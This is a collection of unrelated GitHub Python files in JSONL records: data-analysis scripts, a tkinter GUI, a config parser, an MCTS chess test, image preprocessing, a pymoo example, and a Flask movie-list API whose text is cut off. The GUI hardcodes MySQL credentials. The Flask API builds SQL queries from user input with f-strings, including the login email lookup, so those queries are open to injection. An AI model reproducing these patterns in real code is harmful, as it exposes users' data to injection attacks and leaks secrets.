+{"seq_id":"18690952489","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 20 13:23:36 2020\nv2 version of this script was to work with BLS QCEW data\nv3 version is to work \n@author: aligo\n\"\"\"\n\nimport loans_common as co\n\nimport pandas as pd\nimport zipfile\nfrom plotnine import * # python lib to use ggplot\nfrom io import BytesIO\nfrom urllib.request import urlopen\n\nnaics = 'NAICS2'\nexcsole = False\n\nloans = co.ReadPPPdata(naics)\n\n# Number of loans per county and NAICS2\n[loans_y, countyfips] = co.MatchCounties(loans, excsole, naics)\n\n# EXECUTE THIS COMMAND ONLY AFTER CHECKING THE EXCEL FILE OF UNMATCHED LOANS in Downloads/\nloansum = co.AddManualCounties(loans_y, excsole, naics)\n\n# TOTAL NUMBER OF BUSINESSES - from US Census CBP\nurl = urlopen(\"https://www2.census.gov/programs-surveys/cbp/datasets/2018/cbp18co.zip\")\n#Download Zipfile and create pandas DataFrame\nzipfile = zipfile.ZipFile(BytesIO(url.read()))\ncbp = pd.read_csv(zipfile.open('cbp18co.txt'), na_values='N')\n\ncbp['FIPST'] = cbp['fipstate'].astype(str).str.pad(2,fillchar='0')\ncbp['area_fips'] = cbp['FIPST'] + cbp['fipscty'].astype(str).str.pad(3,fillchar='0')\ncnt = cbp[cbp['FIPST'].isin(co.NEstfips) # New England counties\n & ~cbp['fipscty'].eq(999) # exclude fipscty = 999 that are \"statewide\" totals\n & cbp['naics'].str.contains('^[0-9][0-9]----',regex=True)] # 2-digit NAICS codes\ncnt = cnt.assign( industry_code = cnt['naics'].str.slice(start=0,stop=2) ) # 2-digit NAICS codes, cleaned\ncnt['NEstabs'] = cnt[['n<5','n5_9','n10_19','n20_49','n50_99','n100_249','n250_499']\n ].sum(axis=1, skipna=True) # num Establishments with < 500 employees\ncnt = cnt[['area_fips','industry_code','NEstabs']].set_index('area_fips')\n# Add state and county name\ncnt = cnt.join(countyfips.set_index('COUNTY'))\n\n# Join Total Num businesses + Num of loans\ncnt = cnt.reset_index()\ncnt.columns = ['COUNTYfips','NAICS2','NEstabs','State','COUNTYName']\n# adjusts 2-digit NAICS that are joint, e.g. NAICS 31-33 Manufacturing\ncnt = co.OverrideNAICS2(cnt)\n\npen = co.CalcPenetration(loansum, cnt, naics)\n\n# total per county \ndfc = pen.groupby(['COUNTYName']).agg('sum').reset_index()\ndfc['penetration'] = dfc['NLoans'] / dfc['NEstabs']\nggplot(dfc, aes(x='reorder(COUNTYName,penetration)', y='penetration')\n ) + geom_bar(stat=\"identity\"\n ) + xlab('County'\n ) + ylab('PPP Loan Penetration'\n ) + ggtitle('New England PPP Penetrations per County'\n ) + theme(axis_text_y = element_text(size=6)\n ) + coord_flip()\n\n# total per NAICS\ndfp = pen.groupby(['NAICS2','NAICSdescr']).agg('sum').reset_index()\ndfp['penetration'] = dfp['NLoans'] / dfp['NEstabs']\n\nggplot(dfp, aes(x='reorder(NAICSdescr,penetration)', y='penetration')\n ) + geom_bar(stat=\"identity\"\n ) + xlab('NAICS 2 Digit Sector'\n ) + ylab('PPP Loan Penetration'\n ) + ggtitle('New England PPP Penetrations per NAICS Sector'\n# ) + scale_y_continuous(trans = 'log2'\n ) + coord_flip()\n\n# Histogram of County-NAICS penetrations\nggplot(pen[pen.penetration.le(1)], aes(x='penetration')\n ) + geom_histogram(binwidth=.05\n ) + xlab('PPP Loan Penetration'\n ) + ylab('Number of Counties-Sectors'\n ) + ggtitle('Distribution of PPP Penetration <= 1 in New England')\n\n# outlier penetrations\nggplot(pen, aes(x='State', y='penetration')\n ) + geom_boxplot(\n ) + xlab('State'\n ) + ylab('Penetration'\n ) + ggtitle('Outliers of PPP Penetration in New England')\n\n\n\n\n\n","repo_name":"alexandrekl/fema_r1","sub_path":"loans_CBP.py","file_name":"loans_CBP.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20120639172","text":"import sys\n\nsys.path.append(\"../ariadna\")\nimport mysql.connector\nimport pandas as pd\nimport tkinter as tk\nfrom tkinter.font import Font\nfrom .ventana_base import VentanaBase\n\n\nclass VentanaIndices(tk.Toplevel, VentanaBase):\n def __init__(self, ventana, indices):\n super().__init__(ventana)\n self.title(\"Setear índices\")\n self.ancho = 360\n self.alto = 300\n self.geometry(self.centrar_ventana(ventana, self.ancho, self.alto))\n self.configure(bg=self.color_back)\n self.crear_widgets(indices)\n\n def crear_widgets(self, indices):\n etiquetas = [\n \"Hechos\",\n \"Calificaciones\",\n \"Armas\",\n \"Automotores\",\n \"Objetos\",\n \"Secuestros\",\n \"Involucrados\",\n ]\n\n sep_x = 30\n sep_y = 0.5\n font_label = Font(weight=\"bold\", size=9)\n self.etiquetas_labels = []\n self.etiquetas_entries = []\n\n for i, etiqueta_texto in enumerate(etiquetas):\n etiqueta = tk.Label(\n self,\n text=etiqueta_texto,\n font=font_label,\n fg=\"white\",\n bg=self.color_back,\n )\n etiqueta.place(x=70, y=(i + sep_y) * sep_x, anchor=tk.NW)\n self.etiquetas_labels.append(etiqueta)\n\n cuadro_texto = tk.Entry(\n self,\n textvariable=indices[i],\n )\n cuadro_texto.place(x=160, y=(i + sep_y) * sep_x, anchor=tk.NW)\n self.etiquetas_entries.append(cuadro_texto)\n\n btn_base = tk.Button(\n self,\n text=\"Desde la Base\",\n bg=\"orange\",\n command=lambda: self.conectar_con_base(),\n )\n btn_base.place(x=155, y=250)\n\n btn_archivo = tk.Button(\n self,\n text=\"Desde archivo\",\n bg=\"sky blue\",\n command=lambda: self.conectar_con_archivo(),\n )\n btn_archivo.place(x=40, y=250)\n\n btn_setear_ids = tk.Button(\n self,\n text=\"Setear IDs\",\n bg=\"light green\",\n command=lambda: self.actualizar_indices(indices, self.etiquetas_entries),\n )\n btn_setear_ids.place(x=270, y=250)\n\n def actualizar_indices(self, indices, entries):\n for i, ind in enumerate(indices):\n ind.set(entries[i].get())\n self.mostrar_mensaje_info(\"Los índices fueron configurados correctamente\")\n self.destroy()\n\n def conectar_con_base(self):\n try:\n indices = []\n\n try:\n conexion = mysql.connector.connect(\n host=\"192.168.1.135\",\n port=\"3307\",\n user=\"simon\",\n password=\"monitoreo\",\n database=\"delitos_2023\",\n )\n except Exception as error:\n print(error)\n # Crear un cursor para ejecutar consultas\n cursor = conexion.cursor()\n\n consulta = \"SELECT max(id_hecho) FROM datos_hecho\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n indices.append(0)\n\n consulta = \"SELECT max(id) FROM armas\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n consulta = \"SELECT max(id) FROM automotores\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n consulta = \"SELECT max(id) FROM objetos\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n consulta = \"SELECT max(id) FROM secuestros\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n consulta = \"SELECT max(id) FROM involucrados\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n # Cerrar el cursor y la conexión\n cursor.close()\n conexion.close()\n\n for i, ind in enumerate(indices):\n self.etiquetas_entries[i].delete(0, \"end\")\n self.etiquetas_entries[i].insert(0, ind + 1)\n\n except Exception as error:\n self.mostrar_mensaje_error(error)\n\n def conectar_con_archivo(self):\n ruta_archivo = self.seleccionar_archivo(\"/Exportaciones/Segmentados/\")\n try:\n # Cargar el archivo Excel\n df = pd.read_excel(ruta_archivo, sheet_name=None)\n\n # Lista para almacenar los últimos registros\n ultimos_registros = []\n\n # Iterar sobre cada hoja del archivo\n for hoja, datos in df.items():\n # Obtener el último valor de la primera columna\n try:\n ultimo_registro = datos.iloc[-1, 0]\n ultimos_registros.append(ultimo_registro)\n except Exception:\n raise ValueError(\n \"\"\"Una de las tablas se encuentra vacía y no fue posible\n recuperar ningún índice. Por favor, setea los índices a través de la base\"\"\"\n )\n\n for i, ind in enumerate(ultimos_registros):\n self.etiquetas_entries[i].delete(0, \"end\")\n self.etiquetas_entries[i].insert(0, ind + 1)\n\n except FileNotFoundError:\n self.mostrar_mensaje_info(\"No se ha seleccionado ningún archivo\")\n","repo_name":"simon1494/Ariadna","sub_path":"vista/ventana_indices.py","file_name":"ventana_indices.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11125593840","text":"import re\n\nfrom build_model import BuildSpec, BuildException\nfrom config import PROJ_EXT, PACKAGE_EXT, COMP_EXT, CONFIG_EXT, OPTION_EXT\nfrom project_vars import *\nfrom projects import MultiVariable, PRIVATE_SUFFIX\n\nSCOPE_EXPORT = 'export'\n\n# zero-width joiner, indicates where lines were merged via '\\'\nZWJ = u'\\u200d'\n\ndef parse_list(s):\n \"\"\"\n Parse a string as a space-separated list of items,\n accounting for quoting.\n :param s:\n :return: list of items\n \"\"\"\n in_quote = False\n keep_quotes = False\n items = []\n item = ''\n\n for ch in s:\n if in_quote:\n if ch == '\"':\n in_quote = False\n if not keep_quotes:\n continue\n else:\n keep_quotes = False\n item += ch\n else:\n if ch == '\"':\n in_quote = True\n if item:\n keep_quotes = True\n else:\n keep_quotes = False\n continue\n if ch == ' ' or ch == '\\t':\n if item:\n items.append(item)\n item = ''\n continue\n if ch == '#':\n # comment\n break\n item += ch\n\n if item:\n items.append(item)\n\n return items\n\n\n# a line is a definition, with scope, optional specs and commas, followed by a comment, either, or none\nLINE = re.compile(r'\\s*(?:(?P[a-zA-Z]+)\\s+)?((?P([A-Za-z_-][A-Za-z0-9_.,-]*))\\s*=\\s*(?P.*?)\\s*)?$')\n\nEMBEDDED_COMMENTS = re.compile(r'#.*?\\u200d')\n\n# make the spec representing \"all\"\nALL_SPEC = BuildSpec('', no_defaults=True)\n# the spec representing \"default\"\nDEFAULT_SPEC = None\n\n\ndef parse_vars(fp, ext, label, errors, warnings):\n \"\"\"\n Parse content from the filelike @fp and return a map\n of variable names to MultiVariable.\n :param fp: filelike for text\n :type fp: file\n :param ext: the file extension\n :param label: label for errant lines (e.g. filename)\n :param errors: updated list of errors\n :param warnings: updated list of warnings\n :rtype: Dict[str, MultiVariable]\n \"\"\"\n num = 0\n\n # variable mappings as MultiVariables\n vars = {}\n # :type: Dict[str, MultiVariable]\n\n def line_error(text):\n errors.append((label, num, text))\n\n def line_warn(text):\n warnings.append((label, num, text))\n\n def process(line):\n \"\"\"\n :type line: str\n \"\"\"\n # replace comments with a space, and strip\n if '#' in line and ZWJ in line:\n line = EMBEDDED_COMMENTS.sub(' ', line)\n line = line.replace(ZWJ, ' ').strip()\n if not line or line.startswith('#'):\n return\n\n # debug(\"checking line: \" + line)\n\n # all lines should be simple assignments\n match = LINE.match(line)\n if not match:\n line_error(\"unexpected syntax in line\")\n return\n\n # validate the LHS\n var_spec = match.group('id')\n if not var_spec:\n return # comment\n\n # rename deprecated settings\n var_spec = var_spec.replace(SIGNER, MLCERT)\n\n if '.' in var_spec:\n idx = var_spec.index('.')\n var = var_spec[0:idx]\n specs_str = var_spec[idx + 1:]\n\n if specs_str == 'default':\n specs = [DEFAULT_SPEC]\n else:\n specs = specs_str.split(',')\n for spec in specs:\n if not spec:\n line_error(\"Unexpected empty specialization in '{0}'\".format(var_spec))\n\n if var in UNSPECIALIZABLE_VARS:\n line_error(\"setting cannot be specialized in '{0}'\".format(var_spec))\n\n else:\n var = var_spec\n specs = [ALL_SPEC]\n\n if var not in ALL_VARS:\n line_warn(\"unrecognized project setting '{0}'\".format(var))\n\n # make sure the variables match the project type (which will be\n # lost shortly afterward because the options/configs/etc. are\n # merged in)\n scope = match.group('scope')\n suffix = PRIVATE_SUFFIX if ext == PROJ_EXT else ''\n if scope:\n if scope != SCOPE_EXPORT:\n line_error(\"unexpected scope (only 'export' known): '{0}'\".format(scope))\n elif var in ALWAYS_EXPORTED_VARS:\n line_warn(\"this setting is always exported: '{0}'\".format(var))\n elif var not in PROJ_EXPORTS and var in ALL_VARS:\n line_error(\"cannot export this setting: '{0}'\".format(var))\n else:\n if ext != PROJ_EXT:\n if ext == PACKAGE_EXT:\n line_warn(\"'export' is meaningless in a package, for: '{0}'\".format(var))\n else:\n line_warn(\"'export' is redundant; all settings are exported: '{0}'\".format(var))\n suffix = ''\n else:\n if var in ALWAYS_EXPORTED_VARS:\n suffix = ''\n\n var_scoped = var + suffix\n\n # convert value to a list\n try:\n value = parse_list(match.group('value'))\n except Exception as e:\n line_error(e.message)\n\n mv = vars.setdefault(var_scoped, MultiVariable())\n\n for spec in specs:\n try:\n exist = mv.set(spec, value)\n\n if exist:\n line_error(\"redefining setting '{0}'\".format(var_spec))\n except BuildException as e:\n line_error(str(e))\n\n num = 0\n curline = ''\n for line in fp.readlines():\n line = line.strip()\n curline += line\n num += 1\n\n if line.endswith('\\\\'):\n # continuation\n curline = curline[:-1] + ZWJ\n continue\n\n process(curline)\n curline = ''\n\n process(curline)\n\n return vars\n","repo_name":"jfwallin/magicClassroom","sub_path":"common/mlsdk/v0.23.0/tools/mabu/src/project_parser.py","file_name":"project_parser.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38200562198","text":"from MctsNode import MctsNode\r\nfrom StockfishEvalRolloutMcts import StockfishEvalRolloutMcts\r\nfrom StokfishRolloutMcts import StockfishRolloutMctsNode\r\nimport random\r\nfrom multiprocessing import Pool\r\nimport chess\r\nimport time\r\n\r\n\r\ndef explore_tree(root, node_class):\r\n exec_time = []\r\n for _ in range(400):\r\n start = time.time()\r\n node = root.explore()\r\n if node.N != 0:\r\n node.add_children(node_class)\r\n node = random.choice(list(node.children.values()))\r\n reward = node.rollout()\r\n node.backpropagation(reward)\r\n exec_time.append(time.time()-start)\r\n print(f\"Medium time for every iteration: {sum(exec_time)/len(exec_time)}\")\r\n return root\r\n\r\n\r\ndef find_best_node(node):\r\n children = node.children\r\n max_key = max(children.items(), key=lambda item: (item[1].N, item[1].T))[0]\r\n max_key_relative = max(children.items(), key=lambda item: (item[1].T/item[1].N))[0]\r\n print(children[max_key].move)\r\n print(children[max_key_relative].move)\r\n return children[max_key]\r\n\r\n\r\nif __name__ == \"__main__\":\r\n node_class = StockfishRolloutMctsNode\r\n board = chess.Board()\r\n root1 = node_class(board)\r\n root2 = node_class(board)\r\n root3 = node_class(board)\r\n root4 = node_class(board)\r\n root5 = node_class(board)\r\n root6 = node_class(board)\r\n start_time = time.time()\r\n\r\n with Pool() as pool:\r\n result = pool.starmap(explore_tree, [(root1, node_class), (root2, node_class), (root3, node_class)])#, (root4, node_class), (root5, node_class), (root6, node_class)])\r\n print(f\"Program finished in {time.time() - start_time} seconds\")\r\n final_tree = sum(result[1:], result[0])\r\n best_move = find_best_node(final_tree)\r\n print(\"-------------------------------------------------------------\")\r\n \"\"\"start_time = time.time()\r\n for root in [root1, root2, root3]:\r\n res = explore_tree(root, node_class)\r\n print(f\"Program finished in {time.time() - start_time} seconds\")\r\n start_time = time.time()\r\n res = explore_tree(root3, node_class)\r\n print(f\"Program finished in {time.time() - start_time} seconds\")\"\"\"\r\n print()\r\n","repo_name":"GiovanniGrotto/ChessMCTS","sub_path":"parallel_test.py","file_name":"parallel_test.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72198591208","text":"import os\nimport math\nimport random\nimport functools\nimport numpy as np\nimport paddle\nimport cv2\nfrom PIL import Image, ImageEnhance\n\nrandom.seed(0)\nnp.random.seed(0)\n\nDATA_DIM = 224\n\nBUF_SIZE = 102400\n\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\ndef resize_short(img, target_size):\n percent = float(target_size) / min(img.shape[0], img.shape[1])\n resized_width = int(round(img.shape[1] * percent))\n resized_height = int(round(img.shape[0] * percent))\n img = cv2.resize(img, (resized_width, resized_height))\n return img\n\n\ndef crop_image(img, target_size, center):\n height, width = img.shape[:2]\n size = target_size\n if center == True:\n w_start = (width - size) / 2\n h_start = (height - size) / 2\n else:\n w_start = np.random.randint(0, width - size + 1)\n h_start = np.random.randint(0, height - size + 1)\n w_end = w_start + size\n h_end = h_start + size\n img = img[h_start:h_end, w_start:w_end, :]\n return img\n\n\ndef random_crop(img, size, scale=[0.08, 1.0], ratio=[3. / 4., 4. / 3.]):\n aspect_ratio = math.sqrt(np.random.uniform(*ratio))\n w = 1. * aspect_ratio\n h = 1. / aspect_ratio\n\n bound = min((float(img.size[0]) / img.size[1]) / (w**2),\n (float(img.size[1]) / img.size[0]) / (h**2))\n scale_max = min(scale[1], bound)\n scale_min = min(scale[0], bound)\n\n target_area = img.size[0] * img.size[1] * np.random.uniform(scale_min,\n scale_max)\n target_size = math.sqrt(target_area)\n w = int(target_size * w)\n h = int(target_size * h)\n\n i = np.random.randint(0, img.size[0] - w + 1)\n j = np.random.randint(0, img.size[1] - h + 1)\n\n img = img.crop((i, j, i + w, j + h))\n img = img.resize((size, size), Image.LANCZOS)\n return img\n\n\ndef rotate_image(img):\n angle = np.random.randint(-10, 11)\n img = img.rotate(angle)\n return img\n\n\ndef distort_color(img):\n def random_brightness(img, lower=0.5, upper=1.5):\n e = np.random.uniform(lower, upper)\n return ImageEnhance.Brightness(img).enhance(e)\n\n def random_contrast(img, lower=0.5, upper=1.5):\n e = np.random.uniform(lower, upper)\n return ImageEnhance.Contrast(img).enhance(e)\n\n def random_color(img, lower=0.5, upper=1.5):\n e = np.random.uniform(lower, upper)\n return ImageEnhance.Color(img).enhance(e)\n\n ops = [random_brightness, random_contrast, random_color]\n np.random.shuffle(ops)\n\n img = ops[0](img)\n img = ops[1](img)\n img = ops[2](img)\n\n return img\n\n\ndef process_image(img_path, data_dim=224):\n img = cv2.imread(img_path)\n img = resize_short(img, target_size=data_dim)\n img = crop_image(img, target_size=data_dim, center=True)\n img = img[:, :, ::-1].astype('float32').transpose((2, 0, 1)) / 255\n img_mean = np.array(mean).reshape((3, 1, 1))\n img_std = np.array(std).reshape((3, 1, 1))\n img -= img_mean\n img /= img_std\n with open(os.path.join('a.txt'), 'w') as f:\n for ele in img.flatten():\n f.write(str(ele))\n f.write(\" \")\n return img.flatten()\n\n\n","repo_name":"PaddlePaddle/benchmark","sub_path":"Inference/model/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"53"} +{"seq_id":"18508974093","text":"def chisla (a):\n b = ['one','two','three','four','five','six','seven','eight','nine']\n c = ['twenty','thirty','forty','fifty','sixty','seventy','eighty','ninety']\n t = ['eleven','twelve','thirteen','fourteen','fifteen','sixteen','seventeen','eighteen','nineteen']\n f = ''\n if a < 0 or a > 999:\n return 0\n s = len(str(a))\n r = str(a)\n if s == 3:\n f += b[int(r[0])-1] +' '\n f += 'hundred '\n f += c[int(r[1])-2] +' '\n f += b[int(r[2])-1] +' '\n if s == 2:\n if a == 10:\n f = 'ten'\n elif a > 10 and a < 20:\n f = t[int(r[1])-1]\n else:\n f += c[int(r[0])-2] +' '\n f += b[int(r[1])-1] +' '\n if s == 1:\n f += b[int(r[0])-1] +' '\n return f\n \nwhile 1:\n try:\n print(chisla(int(input())))\n except:\n print(':(')\n","repo_name":"Gipegil/test","sub_path":"chisla.py","file_name":"chisla.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9354850230","text":"from pymoo.algorithms.so_genetic_algorithm import GA\nfrom pymoo.factory import get_problem\nfrom pymoo.optimize import minimize\nfrom pymoo.util.termination.constr_violation import ConstraintViolationToleranceTermination\n\nproblem = get_problem(\"g05\")\nalgorithm = GA(pop_size=100)\n\nres = minimize(problem,\n algorithm,\n ConstraintViolationToleranceTermination(),\n return_least_infeasible=True,\n seed=1,\n verbose=True)\n\nprint(res.CV[0])\nprint(res.F[0])","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/pymoo/usage/termination/usage_constr_violation.py","file_name":"usage_constr_violation.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"74922932329","text":"test_string = '''\n2\n2\n2\nИванов\nПетров\nСидоров\nИванов\nПетров\nИванов\n'''[1:-1].split('\\n')[::-1]\n\n\ndef input(prompt=''):\n if prompt:\n print(prompt, end='')\n tmp = test_string.pop()\n print(tmp)\n return tmp\n\npeople = set()\npause = set()\nn = int(input())\nm = int(input())\nk = int(input())\ncout = 0\nfor i in range(n + m + k):\n name = input()\n if name in people:\n cout += 1\n pause.add(name)\n people.add(name)\nif (n == k == m) and len(people) == n:\n print('NO')\nelse:\n if len(pause) + cout > 0:\n if ((len(pause) + cout) % 2 != 0):\n print((len(pause) + cout) % 2)\n else:\n print((len(pause) + cout) // 2)\n else:\n print('NO')","repo_name":"tr1ma1d/2BlockPythonTask","sub_path":"213_Languages2.py","file_name":"213_Languages2.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22083868365","text":"from authlib.integrations.flask_client import OAuth\nfrom dotenv import load_dotenv\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom Controle.classConexao import Conexao\nfrom Controle.func import verificaSenha\nload_dotenv()\nimport os\nimport requests\nfrom flask import Flask, jsonify, request, redirect, url_for\nfrom flask_cors import CORS, cross_origin\nfrom psycopg2 import Error\nfrom bcrypt import hashpw, gensalt, checkpw\nfrom datetime import timedelta\nfrom flask_mail import Mail, Message\nfrom flask_jwt_extended import JWTManager, jwt_required, create_access_token, get_jwt_identity, decode_token\n\ntry:\n con = Conexao(host=os.getenv(\"HOST\"), user=os.getenv(\"USER\"), password=os.getenv(\"PASSWORD\"), port=os.getenv(\"PORT\"), database=os.getenv(\"DATABASE\")) \n \n app = Flask(__name__)\n app.config['JWT_SECRET_KEY'] = os.getenv(\"KEY\")\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(days=5)\n app.config['JWT_REFRESH_TOKEN_EXPIRES'] = timedelta(days=5)\n app.secret_key = os.getenv(\"KEYAPP\") \n \n jwt = JWTManager(app)\n \n CORS(app)\n print(\"Conectado\")\n mail = Mail(app)\n oauth = OAuth(app)\n\n \n app.config['MAIL_SERVER'] = 'smtp.office365.com'\n app.config['MAIL_PORT'] = 587\n app.config['MAIL_USERNAME'] = os.getenv(\"MAIL\")\n app.config['MAIL_PASSWORD'] = os.getenv(\"PWD_MAIL\")\n app.config['MAIL_USE_TLS'] = True\n app.config['MAIL_USE_SSL'] = False\n \n mail.init_app(app)\n \n apiUrl = 'https://api-rec.vercel.app'\n recUrl = 'https://rec-eight.vercel.app'\n \n def usersNotVerified():\n sql = \"DELETE FROM verificacao WHERE isvalid = false\"\n con.queryExecute(sql, values=None)\n print('funcionou')\n \n scheduler = BackgroundScheduler()\n scheduler.add_job(usersNotVerified, 'interval', days=1)\n scheduler.start()\n \n google = oauth.register(\n name='google',\n client_id=os.getenv(\"CLIENTID\"),\n client_secret=os.getenv(\"CLIENTSECRET\"),\n access_token_url='https://accounts.google.com/o/oauth2/token',\n access_token_params=None,\n authorize_url='https://accounts.google.com/o/oauth2/auth',\n authorize_params=None,\n api_base_url='https://www.googleapis.com/oauth2/v1/',\n jwks_uri='https://www.googleapis.com/oauth2/v3/certs',\n userinfo_endpoint='https://openidconnect.googleapis.com/v1/userinfo', \n client_kwargs={'scope': 'openid email profile'},\n)\n \n @app.route(\"/\")\n def home():\n return \"API https://rec-eight.vercel.app\"\n \n @app.route('/google-login')\n def google_login():\n google = oauth.create_client('google')\n redirect_uri = url_for('authorize', _external=True)\n return google.authorize_redirect(redirect_uri)\n \n @app.route('/authorize')\n def authorize():\n google = oauth.create_client('google')\n token = google.authorize_access_token()\n print(token)\n resp = google.get('userinfo')\n user_info = resp.json()\n email = user_info['email']\n nome = user_info['name'] \n sql = f\"SELECT * FROM usuarios WHERE email = '{email}';\"\n resposta = con.querySelectOne(sql)\n if resposta is None: \n sql = f'''INSERT INTO usuarios (nome, email, senha) SELECT %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM usuarios WHERE email = %s);'''\n values = (nome, email, nome, email)\n con.queryExecute(sql, values)\n tokenUser = create_access_token(identity=email, expires_delta=timedelta(days=5))\n return jsonify({'status': 'sucess', 'nome': f'{nome}', 'access_token': f'{tokenUser}'})\n else:\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(days=5)\n access_token = create_access_token(identity=resposta[0])\n return jsonify({'status': 'sucess', 'id': f'{resposta[0]}', 'nome': f'{resposta[1]}', 'access_token': f'{access_token}'})\n \n @jwt.expired_token_loader\n @cross_origin()\n def my_expired_token_callback(jwt_header, jwt_payload): \n return redirect(f'{recUrl}/token-expired') \n\n @app.route(\"/usuarios\", methods =['POST']) \n def checarUsuarios():\n try:\n email = request.json['email']\n senha = request.json['senha'].encode('utf-8') \n sql = f\"SELECT * FROM usuarios WHERE email = '{email}'\"\n resposta = con.querySelectOne(sql) \n if(resposta is None):\n return jsonify({'status' : 'fail'})\n else: \n if checkpw(senha, resposta[3].encode('utf-8')): \n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(days=5)\n access_token = create_access_token(identity=resposta[0]) \n return jsonify({'status' : 'sucess', 'id': f'{resposta[0]}', 'nome' : f'{resposta[1]}', 'access_token': f'{access_token}'}) \n else:\n return jsonify({'status' : 'fail'})\n except Exception as e:\n return redirect(f'{recUrl}/error404') \n \n @app.route('/atualizarUsuario', methods=['POST'])\n @jwt_required()\n def atualizarUsuario():\n try: \n nome = request.json['nome'] \n senha = request.json['senha'].encode('utf-8')\n id_usuario = get_jwt_identity()\n sql = f\"SELECT senha FROM usuarios WHERE id = {id_usuario}\"\n senhaBanco = con.querySelectOne(sql)[0]\n if checkpw(senha, senhaBanco.encode('utf-8')): \n sql = f\"UPDATE usuarios SET nome=%s WHERE id = %s\"\n values = (nome, id_usuario)\n con.queryExecute(sql, values) \n return jsonify({'status': 'success'})\n else:\n return jsonify({'status': 'fail'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/atualizarSenha\", methods =['POST'])\n @jwt_required()\n def atualizarSenha():\n try: \n senhaAtual = request.json['senhaAtual'].encode('utf-8')\n senha = request.json['senha'].encode('utf-8')\n id_usuario = get_jwt_identity()\n sql = f\"SELECT senha FROM usuarios WHERE id = {id_usuario}\"\n senhaBanco = con.querySelectOne(sql)[0]\n if checkpw(senhaAtual, senhaBanco.encode('utf-8')):\n if verificaSenha(senha.decode('utf-8')): \n salt = gensalt()\n senha = hashpw(senha, salt).decode('utf-8')\n sql = f\"UPDATE usuarios SET senha=%s WHERE id = %s\"\n values = (senha, id_usuario)\n con.queryExecute(sql, values)\n return jsonify({'status': 'success'})\n else:\n return jsonify({'status': 'senhaFraca'})\n else:\n return jsonify({'status': 'fail'}) \n except Exception as e:\n return redirect(f'{recUrl}/error404') \n \n \n \n @app.route(\"/inserirUsuario\", methods =['POST']) \n def inserirUsuario():\n try:\n nome = request.json['nome']\n email = request.json['email']\n senha = request.json['senha'] \n sql = f\"SELECT * FROM usuarios WHERE email = '{email}';\"\n resposta = con.querySelectOne(sql) \n if resposta is None:\n if verificaSenha(senha):\n senha = senha.encode('utf-8')\n salt = gensalt()\n senha = hashpw(senha, salt).decode('utf-8')\n return redirect(url_for('enviarEmail', email=email, nome=nome, senha=senha)) \n else:\n return jsonify({'status': 'senhaFraca'})\n else: \n return jsonify({'status': 'fail'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/deletarUsuario\", methods = ['POST'])\n @jwt_required()\n def deletarUsuario():\n try:\n id_usuario = get_jwt_identity()\n senhaUser = request.json['senha'].encode('utf-8')\n sql = f\"SELECT * FROM usuarios WHERE id = '{id_usuario}';\"\n resposta = con.querySelectOne(sql)\n senha = resposta[3].encode('utf-8')\n if checkpw(senhaUser, senha):\n sql = f'''DELETE FROM filmes WHERE id_usuario = '{id_usuario}';\n DELETE FROM series WHERE id_usuario = '{id_usuario}';\n DELETE FROM listadesejo WHERE id_usuario = '{id_usuario}';\n DELETE FROM usuarios WHERE id = '{id_usuario}';'''\n con.queryExecute(sql, values=None) \n return jsonify({'status' : 'sucess'})\n else:\n return jsonify({'status' : 'fail'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/filmes\", methods =['GET' ,'POST'])\n @jwt_required()\n def consultarFilmes():\n try: \n if(request.method == 'GET'):\n id = get_jwt_identity()\n sql = f\"SELECT * FROM filmes WHERE id_usuario = '{id}'\"\n results = con.querySelect(sql) \n return results\n elif(request.method == 'POST'):\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity()\n sql = f\"SELECT * FROM filmes WHERE titulo = '{titulo}' AND id_usuario = '{id_usuario}'\"\n resposta = con.querySelectOne(sql) \n if(resposta is None):\n return jsonify({'status' : 'fail'})\n else:\n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/inserirFilme\", methods =['POST'])\n @jwt_required()\n def inserirFilme():\n try:\n titulo = request.json['titulo']\n imagem = request.json['imagem']\n nota = request.json['nota']\n tipo = 